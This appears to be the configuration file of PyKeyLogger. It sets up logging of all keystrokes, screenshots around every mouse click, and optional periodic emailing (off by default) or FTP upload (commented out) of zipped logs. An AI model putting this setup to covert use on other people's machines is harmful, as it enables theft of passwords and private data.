# It is strongly recommended to avoid editing this file directly. Use the control panel instead.
# To bring up the control panel, press the "control key combo" while pykeylogger is running.
# Default master password is blank, so just press enter at the password prompt.

[General]

# For security purposes, this value can only be set through the control panel, to avoid storing your password in plain text.
# Setting it here directly will not work.
# default: "" (Blank password)
Master Password Tooltip = Set to the master password to control pykeylogger.
Master Password = eJwDAAAAAAE=

# default: logs
Log Directory Tooltip = Set to the full path of directory where you want logs to be written. A relative directory can also be specified. This is relative to where you are running pykeylogger from.
Log Directory = logs

# default: True
Hook Keyboard Tooltip = Log keyboard input (if you set this to False, the keylogger will basically do nothing).
Hook Keyboard = True

# default: Control_L;Control_R;F12
Control Key Tooltip = Specify the key combo to press to bring up control panel. Separate multiple keys of the combo with semicolon ";". Some good keys to include are [On Windows: "Lmenu", "Rmenu" (left and right Alt keys), "Lcontrol", "Rcontrol", "Lshift", "Rshift"] [On Linux: "Alt_L", "Alt_R" (left and right Alt keys), "Control_L", "Control_R", "Shift_L", "Shift_R", "Super_L", "Super_R" (left and right meta/windows keys)] [On Both: "Escape", "Delete", "Insert", "F1" through "F12", any number of regular alphanumeric keys (can't use the semicolon as one of the keys).] Make it as complex as you want - just make sure you have enough fingers. :)
Control Key = Control_L;Control_R;F12

# default: None
System Log Tooltip = Log some debug/informational output, to a systemlog file (filename specified here), inside directory specified with "Log Directory". Set to "None" to disable.
System Log = None

_Usage Time Flag Tooltip = No tips
_Usage Time Flag = eJxLyywqLiktTgUAD3wDdg==

[Detailed Log Writer]

[[General]]

# Name of class to instantiate to create this thread. Internal use only.
_Thread_Class = DetailedLogWriterFirstStage

# default: True
Enable Logger Tooltip = Enable this logger.
Enable Logger = True

# default: detailedlog
Log Subdirectory Tooltip = Use this subdirectory inside the main log directory for this logger.
Log Subdirectory = detailed_log

# default: logfile.txt
Log Filename Tooltip = Log all output to the file (filename specified here) inside directory specified with "Log Subdirectory".
Log Filename = logfile.txt

# default: False
Parse Backspace Tooltip = Translate backspace chacarter into printable string (for Notepad compatibility)
Parse Backspace = False

# default: False
Parse Escape Tooltip = Translate escape chacarter into printable string (for Notepad compatibility)
Parse Escape = False

# default: None
Applications Not Logged Tooltip = Specify one or more applications by full path name whose input will not be logged. Separate multiple applications with semicolon ";". Leave as "None" to log all applications.
Applications Not Logged = None

# default: |
Log File Field Separator Tooltip = Character(s) to use as the field separator in the log file.
Log File Field Separator = |

# default: False
Log Key Count Tooltip = Include an extra column in the log with a count of keypresses for that line of data.
Log Key Count = False

# default: 0
Limit Keylog Field Size Tooltip = Limit the size of the keylog field to this number of characters (0 means no limit). If you import the log data into MS Access and use the 'Text' field type, you may wish to set this to 255.
Limit Keylog Field Size = 0

# default: [KeyName:%keyname%]
Non-printing Character Representation Tooltip = How to represent non-printing characters in the log (such as various function and control keys). The string you set here will be printed every time any non-printing key is pressed. The following variables are interpreted: "%keyname%" variable inserts the name of the key pressed, "%scancode%" inserts the scan code, %vkcode% inserts the virtual key code.
Non-printing Character Representation = [KeyName:%keyname%]


[[E-mail]]

# Name of class to instantiate to create this thread. Internal use only.
_Thread_Class = EmailLogSender

# default: False
SMTP Send Email Tooltip = Set to True to enable automatic periodic emails of a zipped archive of logfiles.
SMTP Send Email = False

# default: True
SMTP Needs Login Tooltip = Set to True if your SMTP server requires a login with username/password.
SMTP Needs Login = True

# default: yourusername
SMTP Username Tooltip = Set to your username for the SMTP server (only needed if your SMTP server requires a login).
SMTP Username = yourusername

# For security purposes, this value can only be set through the control panel, to avoid storing your password in plain text.
# Setting it here directly will not work.
# default: yourpassword
SMTP Password Tooltip = Set to your password (only needed if your SMTP server requires a password).
SMTP Password = eJyrzC8tKkgsLi7PL0oBACKaBUM=

# default: smtp.gmail.com
SMTP Server Tooltip = Set to the hostname of your SMTP server.
SMTP Server = smtp.gmail.com

# default: 587
SMTP Port Tooltip = Set to the port of your SMTP server (Standard ports are: port 25 for no encryption; port 587 for TLS; port 465 for SSL)
SMTP Port = 587

# default: True
SMTP Use TLS Tooltip = Set this to True to enable TLS encryption (a good idea if your server supports it).
SMTP Use TLS = True

# default: yourfromaddress@host.com
SMTP From Tooltip = Set to the email address that you want to appear in the "From" line in your email.
SMTP From = yourfromaddress@host.com

# default: yourtoaddress@host.com
SMTP To Tooltip = Set to the email address that you want to send email to. Separate multiple addresses semicolon ";".
SMTP To = yourtoaddress@host.com

# default: Automatic Logfile Email
SMTP Subject Tooltip = Set to the text you want to appear in the Subject line in your email.
SMTP Subject = Automatic Logfile Email

# default: "Please see attached zipfile."
SMTP Message Body Tooltip = Set to the text that you want to appear in the message body of your email.
SMTP Message Body = Please see attached zipfile.

# default: 4.0
Email Interval Tooltip = Specify the time interval between automatic log email events, in HOURS.
Email Interval = 4.0

[[Zip]]

# Name of class to instantiate to create this thread. Internal use only.
_Thread_Class = LogZipper

# default: False
Zip Enable Tooltip = Set this to true to enable automatic zipping of logfiles to dated archives (and deletion of files that have been zipped).
Zip Enable = False

# default: 4.0
Zip Interval Tooltip = Set this to the time interval between automatic zip events, in HOURS.
Zip Interval = 4.0

#~ [FTP]

#~ # default: False
#~ FTP Enable Tooltip = Set to True to enable automatic periodic uploading of a zipped archive of logfiles by FTP.
#~ FTP Enable = False

#~ # default: your.FTP.server
#~ FTP Server Tooltip = Set to the hostname of your FTP server.
#~ FTP Server = your.FTP.server

#~ # default: 21
#~ FTP Port Tooltip = Set to the port number of your FTP server (most FTP servers run on port 21).
#~ FTP Port = 21

#~ # default: pykeylogger
#~ FTP Upload Directory Tooltip = Set to the directory on the server where you would like to upload (relative or full path accepted).
#~ FTP Upload Directory = pykeylogger

#~ # default: anonymous
#~ FTP Username Tooltip = Set to your username on the target FTP server.
#~ FTP Username = anonymous

#~ # For security purposes, this value can only be set through the control panel, to avoid storing your password in plain text.
#~ # Setting it here directly will not work.
#~ # default: anonymous@
#~ FTP Password Tooltip = Set to your password on the target FTP server.
#~ FTP Password = eJyrzC8tKkgsLi7PL0oBACKaBUM=

#~ # default: True
#~ FTP Passive Tooltip = Set to True to enable passive mode file transfer (recommended).
#~ FTP Passive = True

#~ # default: 4.0
#~ FTP Interval Tooltip = Set this to the time interval between automatic FTP events, in HOURS.
#~ FTP Interval = 4.0

[[Old Log Deletion]]

# Name of class to instantiate to create this thread. Internal use only.
_Thread_Class = OldLogDeleter

# default: False
Delete Old Logs Tooltip = Set to True to enable automatic deletion of old logs.
Delete Old Logs = False

# default: 2.0
Max Log Age Tooltip = Set to the maximum age of the logs that you want to keep, in DAYS. Logs older than this will be deleted.
Max Log Age = 2.0

# default: 2.0
Age Check Interval Tooltip = Set to the frequency of checking for and deleting logs older than maxLogAge, in HOURS.
Age Check Interval = 2.0


[[Log Flush]]

# Name of class to instantiate to create this thread. Internal use only.
_Thread_Class = LogFlusher

# default: 120
Flush Interval Tooltip = Specify the time interval between buffer autoflush events, in SECONDS.
Flush Interval = 120.0

[[Log Rotation]]

# Name of class to instantiate to create this thread. Internal use only.
_Thread_Class = LogRotator

# default: 4.0
Log Rotation Interval Tooltip = Specify the time interval between log rotation events, in HOURS.
Log Rotation Interval = 4.0

[Click Image Capture]

[[General]]

# Name of class to instantiate to create this thread. Internal use only.
_Thread_Class = OnClickImageCaptureFirstStage

# default: True
Capture Clicks Tooltip = Enable the capture of a partial screenshot at every mouse click. This functionality grabs an area around the mouse pointer with every click (size defined with the width and height settings in this panel). Images are stored in the 'images' subdirectory of the main Log Directory, in PNG format (other formats coming soon).
Capture Clicks = True

# default: detailedlog
Log Subdirectory Tooltip = Use this subdirectory inside the main log directory for this logger.
Log Subdirectory = click_images

# default: logfile.txt
Log Filename Tooltip = Log all output to the file (filename specified here) inside directory specified with "Log Subdirectory".
Log Filename = logfile.txt

# default: 150
Capture Clicks Width Tooltip = Specify the width (in pixels) for the captured image around the mouse cursor. The coordinates of the mouse cursor during the click are the center of the image. Note that the larger the area you want to capture, the more disk space this will take.
Capture Clicks Width = 150

# default: 150
Capture Clicks Height Tooltip = Specify the height (in pixels) for the captured image around the mouse cursor. The coordinates of the mouse cursor during the click are the center of the image. Note that the larger the area you want to capture, the more disk space this will take.
Capture Clicks Height = 150

# default: png
Capture Clicks Image Format Tooltip = Specify the file format of the images captured on click. The following formats are supported: png, jpg, bmp, gif, pcx, ppm, pgm, pbm, tiff, xbm.
Capture Clicks Image Format = png

# default: 75
Capture Clicks Image Quality Tooltip = Specify the image file quality of the images captured on click. This option only applies to the JPG file format. Specify a value from 1 to 100 (100 being completely uncompressed).
Capture Clicks Image Quality = 75

[[E-mail]]

# Name of class to instantiate to create this thread. Internal use only.
_Thread_Class = EmailLogSender

# default: False
SMTP Send Email Tooltip = Set to True to enable automatic periodic emails of a zipped archive of logfiles.
SMTP Send Email = False

# default: True
SMTP Needs Login Tooltip = Set to True if your SMTP server requires a login with username/password.
SMTP Needs Login = True

# default: yourusername
SMTP Username Tooltip = Set to your username for the SMTP server (only needed if your SMTP server requires a login).
SMTP Username = yourusername

# For security purposes, this value can only be set through the control panel, to avoid storing your password in plain text.
# Setting it here directly will not work.
# default: yourpassword
SMTP Password Tooltip = Set to your password (only needed if your SMTP server requires a password).
SMTP Password = eJyrzC8tKkgsLi7PL0oBACKaBUM=

# default: smtp.gmail.com
SMTP Server Tooltip = Set to the hostname of your SMTP server.
SMTP Server = smtp.gmail.com

# default: 587
SMTP Port Tooltip = Set to the port of your SMTP server (Standard ports are: port 25 for no encryption; port 587 for TLS; port 465 for SSL)
SMTP Port = 587

# default: True
SMTP Use TLS Tooltip = Set this to True to enable TLS encryption (a good idea if your server supports it).
SMTP Use TLS = True

# default: yourfromaddress@host.com
SMTP From Tooltip = Set to the email address that you want to appear in the "From" line in your email.
SMTP From = yourfromaddress@host.com

# default: yourtoaddress@host.com
SMTP To Tooltip = Set to the email address that you want to send email to. Separate multiple addresses semicolon ";".
SMTP To = yourtoaddress@host.com

# default: Automatic Logfile Email
SMTP Subject Tooltip = Set to the text you want to appear in the Subject line in your email.
SMTP Subject = Automatic Logfile Email

# default: "Please see attached zipfile."
SMTP Message Body Tooltip = Set to the text that you want to appear in the message body of your email.
SMTP Message Body = Please see attached zipfile.

# default: 4.0
Email Interval Tooltip = Specify the time interval between automatic log email events, in HOURS.
Email Interval = 4.0

[[Zip]]

# Name of class to instantiate to create this thread. Internal use only.
_Thread_Class = LogZipper

# default: False
Zip Enable Tooltip = Set this to true to enable automatic zipping of logfiles to dated archives (and deletion of files that have been zipped).
Zip Enable = False

# default: 4.0
Zip Interval Tooltip = Set this to the time interval between automatic zip events, in HOURS.
Zip Interval = 4.0

[[Old Log Deletion]]

# Name of class to instantiate to create this thread. Internal use only.
_Thread_Class = OldLogDeleter

# default: False
Delete Old Logs Tooltip = Set to True to enable automatic deletion of old logs.
Delete Old Logs = False

# default: 2.0
Max Log Age Tooltip = Set to the maximum age of the logs that you want to keep, in DAYS. Logs older than this will be deleted.
Max Log Age = 2.0

# default: 2.0
Age Check Interval Tooltip = Set to the frequency of checking for and deleting logs older than maxLogAge, in HOURS.
Age Check Interval = 2.0


[[Log Flush]]

# Name of class to instantiate to create this thread. Internal use only.
_Thread_Class = LogFlusher

# default: 120
Flush Interval Tooltip = Specify the time interval between buffer autoflush events, in SECONDS.
Flush Interval = 120.0

[[Log Rotation]]

# Name of class to instantiate to create this thread. Internal use only.
_Thread_Class = LogRotator

# default: 4.0
Log Rotation Interval Tooltip = Specify the time interval between log rotation events, in HOURS.
Log Rotation Interval = 4.0
